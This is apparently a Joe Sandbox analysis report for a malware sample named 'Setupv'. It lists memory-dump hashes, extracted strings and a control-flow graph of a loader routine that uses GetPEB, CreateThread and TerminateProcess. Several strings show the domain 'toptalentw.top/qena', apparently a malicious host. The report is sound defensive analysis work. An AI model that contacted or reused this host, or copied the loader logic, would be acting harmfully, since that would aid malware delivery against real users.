                                                                                                                                                                                                                          • Opcode ID: 512fa5f802178c9858049ccadf2b4a8245d0ddc196589dcb6aee21b239ee44ff
                                                                                                                                                                                                                          • Instruction ID: 2cda423c538ed2887aff2724fe9741b329f0040419e40438bc4b2d0d149507dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 512fa5f802178c9858049ccadf2b4a8245d0ddc196589dcb6aee21b239ee44ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69C16672A583608BE314DB28CD417ABB7D6AFC5308F09D93DED85D7242EA34E90587D2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: xy$}{
                                                                                                                                                                                                                          • API String ID: 0-123651060
                                                                                                                                                                                                                          • Opcode ID: 06065dac2b9c203641ca009bee2deef784400d2eb55ad17d4b2fa87674ddc375
                                                                                                                                                                                                                          • Instruction ID: 896ee902545ebf383de9ce77d831d3625db813bd4b1ada66fb0396ea53b59c86
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06065dac2b9c203641ca009bee2deef784400d2eb55ad17d4b2fa87674ddc375
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 307102715483108BC718CF19C89166BB3B2EFD1368F29EA2CE8D94B394E735C941CB96
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $ v!$jLrP
                                                                                                                                                                                                                          • API String ID: 0-3960616530
                                                                                                                                                                                                                          • Opcode ID: 466b18361d32435c174c91ad11d79e6d3a44d0017f75a5d2eec7ff72e2da08d1
                                                                                                                                                                                                                          • Instruction ID: 4d530d6b5d06cabec9e57e97a3bbb7a0fbde36689cb96adeda66558db5acaca8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 466b18361d32435c174c91ad11d79e6d3a44d0017f75a5d2eec7ff72e2da08d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A751C17154C7D18FC325CF2990A036AFFE0AFA6344F6898AEE4D997352CB758404CB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: S}&$W}&
                                                                                                                                                                                                                          • API String ID: 0-1213038652
                                                                                                                                                                                                                          • Opcode ID: 8c88b4c76443acdccb166bcc6bf9338eda16d67df25db79be61b07939df1bb3f
                                                                                                                                                                                                                          • Instruction ID: baa48105a32495e329952e386ab775c5f3467128e84a576f3cfb22834f6eee90
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c88b4c76443acdccb166bcc6bf9338eda16d67df25db79be61b07939df1bb3f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5941DEB19083548FE314DF25A89065BFBE6EBC5344F00CA2CE598AB295DB71950A8F82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: hl7$ll7
                                                                                                                                                                                                                          • API String ID: 0-563782489
                                                                                                                                                                                                                          • Opcode ID: f32c30bbf2cd6983a2d3d0cc048e323b8c1d14fce89716a9f74a8dffc98cbcfc
                                                                                                                                                                                                                          • Instruction ID: 51f37c14117115108efd62f076e5d52dd4748ee8c77fbbd427c08c6020305707
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f32c30bbf2cd6983a2d3d0cc048e323b8c1d14fce89716a9f74a8dffc98cbcfc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6414676A557208BC310CF19C440B2BF7E6AFD9318F59E91DE8989B294C7369806CBD2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: )-=E
                                                                                                                                                                                                                          • API String ID: 0-2696222650
                                                                                                                                                                                                                          • Opcode ID: f6bd6f90b10815a84df54fe386dce3d34911b586df189b9adf63f4a3e37c45e3
                                                                                                                                                                                                                          • Instruction ID: 925a802fd3bbac1979cfc24194ea1ddda6ca4a7f1d00e3b6e5280e71efd151c7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6bd6f90b10815a84df54fe386dce3d34911b586df189b9adf63f4a3e37c45e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12724BB0655B809FD361CF39C945BA7BFE9AB0A300F04896EE1EEC7382C6756540CB56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: %%*+
                                                                                                                                                                                                                          • API String ID: 0-1274622323
                                                                                                                                                                                                                          • Opcode ID: 98ab402573cedf33b75f0cd35d70db5905112295be48ab0fc173f644cce4c8ef
                                                                                                                                                                                                                          • Instruction ID: d2e13d14b51669b3d62b01898754797e20e169b64a266f10326afcf704987549
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98ab402573cedf33b75f0cd35d70db5905112295be48ab0fc173f644cce4c8ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F1DFB19483518BC324CF25C89126BB7E1FFC5368F58DA1CE8E94B391E7759805CB82

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 221 2730000-27300e3 222 27300e9-2730503 221->222 222->222 223 2730509-2730671 call 2730ab9 call 27310b9 call 2731269 call 2730e59 222->223 232 2730aa2-2730aa5 223->232 233 2730677-273067e 223->233 234 2730689-273068d 233->234 235 27306af-273072a GetPEB 234->235 236 273068f-27306ad call 2730fd9 234->236 237 2730735-2730739 235->237 236->234 239 2730751-2730763 call 2730c19 237->239 240 273073b-273074f 237->240 246 2730765-273078b 239->246 247 273078d-27307ae CreateThread 239->247 240->237 248 27307b1-27307b5 246->248 247->248 250 2730a76-2730aa0 TerminateProcess 248->250 251 27307bb-27307ee call 2731119 248->251 250->232 251->250 255 27307f4-2730843 251->255 257 273084e-2730854 255->257 258 2730856-273085c 257->258 259 273089c-27308a0 257->259 260 273086f-2730873 258->260 261 273085e-273086d 258->261 262 27308a6-27308b3 259->262 263 273096e-2730a61 call 2730c19 call 2730ab9 call 27310b9 259->263 264 2730875-2730883 260->264 265 273089a 260->265 261->260 266 27308be-27308c4 262->266 289 2730a63 263->289 290 2730a66-2730a70 263->290 264->265 269 2730885-2730897 264->269 265->257 267 27308c6-27308d4 266->267 268 27308f4-27308f7 266->268 272 27308f2 267->272 273 27308d6-27308e5 267->273 274 27308fa-2730901 268->274 269->265 272->266 273->272 277 27308e7-27308f0 273->277 274->263 279 2730903-273090c 274->279 277->268 279->263 281 273090e-273091e 279->281 283 2730929-2730935 281->283 285 2730937-2730964 283->285 286 2730966-273096c 283->286 285->283 286->274 289->290 290->250
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Q#
                                                                                                                                                                                                                          • API String ID: 0-665244491
                                                                                                                                                                                                                          • Opcode ID: 3b2272ef96db07eab82b14b03f521a14c17f21c2ad14365d2d54ffed2a6ee84a
                                                                                                                                                                                                                          • Instruction ID: 6b4324ac2dc647454d922203ebda2f80b46fc053818f6beea4411c0ea1f42757
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b2272ef96db07eab82b14b03f521a14c17f21c2ad14365d2d54ffed2a6ee84a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E122769413384FEB19CEBACC953AE6563B7C0218F86D22DD917EB249DF3508834AC1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: a+<Z
                                                                                                                                                                                                                          • API String ID: 0-1854613358
                                                                                                                                                                                                                          • Opcode ID: 30c15a9635ce68a75f5354dce974d8eb7a294a6c366b393ef7a04ce741809532
                                                                                                                                                                                                                          • Instruction ID: f68d9006272cddb2b900cd7309f1716aae19a65c7a88c61730cbc1eacbc0d25f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c15a9635ce68a75f5354dce974d8eb7a294a6c366b393ef7a04ce741809532
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01C14671988310ABC725DF28C891767B7E9EF85319F19D92CECC69B291E374A800C796
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: a+<Z
                                                                                                                                                                                                                          • API String ID: 0-1854613358
                                                                                                                                                                                                                          • Opcode ID: 2fea0a403456f85e3f89228bb671889bc016add2d70bae4071898aea61e08ba4
                                                                                                                                                                                                                          • Instruction ID: a6a5aa0969518355d43f139e85f8ceb1f5caa00cc342171f16723ff1ba5640e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fea0a403456f85e3f89228bb671889bc016add2d70bae4071898aea61e08ba4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20C15B326943618BD324CE14CC907FA73D2EBD9328F19992DED8687382EB349841C7D1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: <<
                                                                                                                                                                                                                          • API String ID: 0-2834586819
                                                                                                                                                                                                                          • Opcode ID: 7e22929db97a21e2453812024dafad045196dcf39038418822cf6fa806ba61a0
                                                                                                                                                                                                                          • Instruction ID: a820825f5a3edd878341102890cf1fd1bbd28d135e4940fc38db811e010dd21e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e22929db97a21e2453812024dafad045196dcf39038418822cf6fa806ba61a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90D1CEB5650B118FD728CF29C891B62B7F2FF88314B19896DD49A8B751DB38E806CB50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: a+<Z
                                                                                                                                                                                                                          • API String ID: 0-1854613358
                                                                                                                                                                                                                          • Opcode ID: 4996873d97567482aafa73463cdeb1983c5f152c9cc50ca9b3d0a76d0f83fb0d
                                                                                                                                                                                                                          • Instruction ID: 4cb66db6d09add199ac60818af57e5d0697b2de2353f10610b460d83cd9abb34
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4996873d97567482aafa73463cdeb1983c5f152c9cc50ca9b3d0a76d0f83fb0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B9159366E5724CBC3108E58CC806F673D2EBD9228F29965CEDA6973D2D674AC06C6D0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: l
                                                                                                                                                                                                                          • API String ID: 0-1545559182
                                                                                                                                                                                                                          • Opcode ID: 6b72b7302b8d8cd3ccfb46a2d5601ee2cb39fea6d8d8b3538a98862c4fca7341
                                                                                                                                                                                                                          • Instruction ID: 03c112581c45c5df50854530956abd2e543e359f153157b21d35b7e06ed2bc00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b72b7302b8d8cd3ccfb46a2d5601ee2cb39fea6d8d8b3538a98862c4fca7341
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6191047255D3E08BD335CF65C8907DBBBE2ABC2308F19996DC8C95B245CA35140ACB92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                          • Opcode ID: 9ad3a742f6a2f79b33567744ccaee04224db6162a5d3a2820b7a712f7f039f7d
                                                                                                                                                                                                                          • Instruction ID: 8a9901c38c4a04f809ec13333c1ed337edb07b539a7a4441ab6156154f174129
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ad3a742f6a2f79b33567744ccaee04224db6162a5d3a2820b7a712f7f039f7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCB148711093819FD325CF18C88065BFBE1AFA9708F448E2DE5D997782D631E918CBA7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: tu
                                                                                                                                                                                                                          • API String ID: 0-719662014
                                                                                                                                                                                                                          • Opcode ID: 5d3a1737c3aaaf59b6f0673907374959c3ad5549e5d4cd0283384ae0fa869180
                                                                                                                                                                                                                          • Instruction ID: 21409043c278d01b9945ab412b31e42682b9ba0100390f61e9916601d33861ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d3a1737c3aaaf59b6f0673907374959c3ad5549e5d4cd0283384ae0fa869180
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5518B72A583218BD719CF25C89237BB7E2EFD6345F09A52CE8C58B390D77A8801C746
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH
                                                                                                                                                                                                                          • API String ID: 0-170685188
                                                                                                                                                                                                                          • Opcode ID: 6437ef52f11b16ce89f1f3b26411777e82ef058ac73fbe25fb4beabc00800170
                                                                                                                                                                                                                          • Instruction ID: 64e983008cd9e46363be146ca46004a3701a0e7505e1ed859aed87dbd3054ee9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6437ef52f11b16ce89f1f3b26411777e82ef058ac73fbe25fb4beabc00800170
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53518C76EA43304BD3209E6C89C076BF7A5AB85368F5AD62DCCD8AB390C2749C4187D1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: a+<Z
                                                                                                                                                                                                                          • API String ID: 0-1854613358
                                                                                                                                                                                                                          • Opcode ID: 15c604202b0660ab9049148600534766c7161d901bed54d296a626280abf4d9e
                                                                                                                                                                                                                          • Instruction ID: 38bca64df94b1f6e97ddf98969bc4eb23859893ebfed258bd9332b82302ba81f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15c604202b0660ab9049148600534766c7161d901bed54d296a626280abf4d9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49512572A983105BD718DE24D860A3BB7E6AFC430CF04A82DFE8597250E730D815CB92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: toptalentw.top/qena
                                                                                                                                                                                                                          • API String ID: 0-3958720316
                                                                                                                                                                                                                          • Opcode ID: 01532a6b4417d3aee69575cd74eb54c15157ef956e11bc14f7b08918c06d859f
                                                                                                                                                                                                                          • Instruction ID: 78860e6479e9c10bc17937b83c7804114c79e3cb36ea751f463e3696460f58d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01532a6b4417d3aee69575cd74eb54c15157ef956e11bc14f7b08918c06d859f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F518876A583118BC310CF68C8901ABB7A2FFC9714F2A946CE5849B3A4EA318C01C7D6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 01
                                                                                                                                                                                                                          • API String ID: 0-3477152822
                                                                                                                                                                                                                          • Opcode ID: 024833015c11d77abcd35bf9780db7288dc7213c29cc8d82a074608ecb275750
                                                                                                                                                                                                                          • Instruction ID: 81f0c7f9869f1dae0c7dd93fa3348483dbdcd9c2203ccfe01f458d8f32362fd1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 024833015c11d77abcd35bf9780db7288dc7213c29cc8d82a074608ecb275750
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C510FB36197508BC314CF29C94225BFBE2AFD4744F1A8A2DF5D6DB390DB3499058B82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID: GFIH
                                                                                                                                                                                                                          • API String ID: 2994545307-170685188
                                                                                                                                                                                                                          • Opcode ID: 203fdad902234dea5560e769e9be800462907338938ce79b5ccc29bd43262d7e
                                                                                                                                                                                                                          • Instruction ID: dc23d42a2b7b1d71979570da4cec54f74ea9a04ec986be96fd7cf007f0b6eec1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 203fdad902234dea5560e769e9be800462907338938ce79b5ccc29bd43262d7e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72412977E583608BD338CE29C8913ABB7D2EBC4304F16953DD98ED7241CA74A846CB91
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: toptalentw.top/qena
                                                                                                                                                                                                                          • API String ID: 0-3958720316
                                                                                                                                                                                                                          • Opcode ID: 853b54ed7c40d8a21b2f3a55cbfe9c345bc0b07e729b9d5a0607c14e31b89f63
                                                                                                                                                                                                                          • Instruction ID: b3c3f93fa84f0834362a2d590ee417ad10771fc80b669f7b0f09b0d8dbc0b4d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 853b54ed7c40d8a21b2f3a55cbfe9c345bc0b07e729b9d5a0607c14e31b89f63
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D93159379547228BC324CF6CC8801ABB3A2EF99354B26962DD5859B2B1DB709C15C781
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: a+<Z
                                                                                                                                                                                                                          • API String ID: 0-1854613358
                                                                                                                                                                                                                          • Opcode ID: 3bcac9a430eac6a35bd1e11ec10630ec84fc58680b83599507e79b2d0d84f3bc
                                                                                                                                                                                                                          • Instruction ID: d4f8132cc6b7fc623d862d2b2dc5cfe74c4a6aa6da089b501cd69d7cffe3ff0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bcac9a430eac6a35bd1e11ec10630ec84fc58680b83599507e79b2d0d84f3bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A115B76BE47208BC3105E6899C0737B3966F96629F699129DC4457241D3759C1286E0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH
                                                                                                                                                                                                                          • API String ID: 0-170685188
                                                                                                                                                                                                                          • Opcode ID: be772044425c85b5a41482c3f0dd6d7edfbda30217db7abcaa5ae286d070f5a5
                                                                                                                                                                                                                          • Instruction ID: b13f6dadb7ef53338aa313a38b9145f1cc3dfbd2a1da758a6d09531ec05e9cc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be772044425c85b5a41482c3f0dd6d7edfbda30217db7abcaa5ae286d070f5a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F11E234680A168FD324CF29C454772F3A2FF96309F14995CE5C787291CB75B8A1CB40
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3861434553-0
                                                                                                                                                                                                                          • Opcode ID: d3b1c23a7f6cfbd33e1a837b7d96b32a47bea145f832e1ebff88c80ce443ed17
                                                                                                                                                                                                                          • Instruction ID: dc09c6c6bccaf79fe5d73967650d446ddce3f6aca6b922f82190520a47a88a90
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3b1c23a7f6cfbd33e1a837b7d96b32a47bea145f832e1ebff88c80ce443ed17
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6C08C30CC40608BC0002A10A00487AE278970F640B807820E00BEB000E220A0518A56
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 74cd19c393c9f80611aa04f91d3e74aa183528ecaa9c545f811df00f42817e6c
                                                                                                                                                                                                                          • Instruction ID: d7b2fb3986dceb6d7dd9907eca34ba86033deda11bfa998b6bb8db40b0de7a1e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74cd19c393c9f80611aa04f91d3e74aa183528ecaa9c545f811df00f42817e6c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C52D1B0948B848FE735CF24C4A47A7BBE1BB41318F14A83DD5EB46A83C379A485C756
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
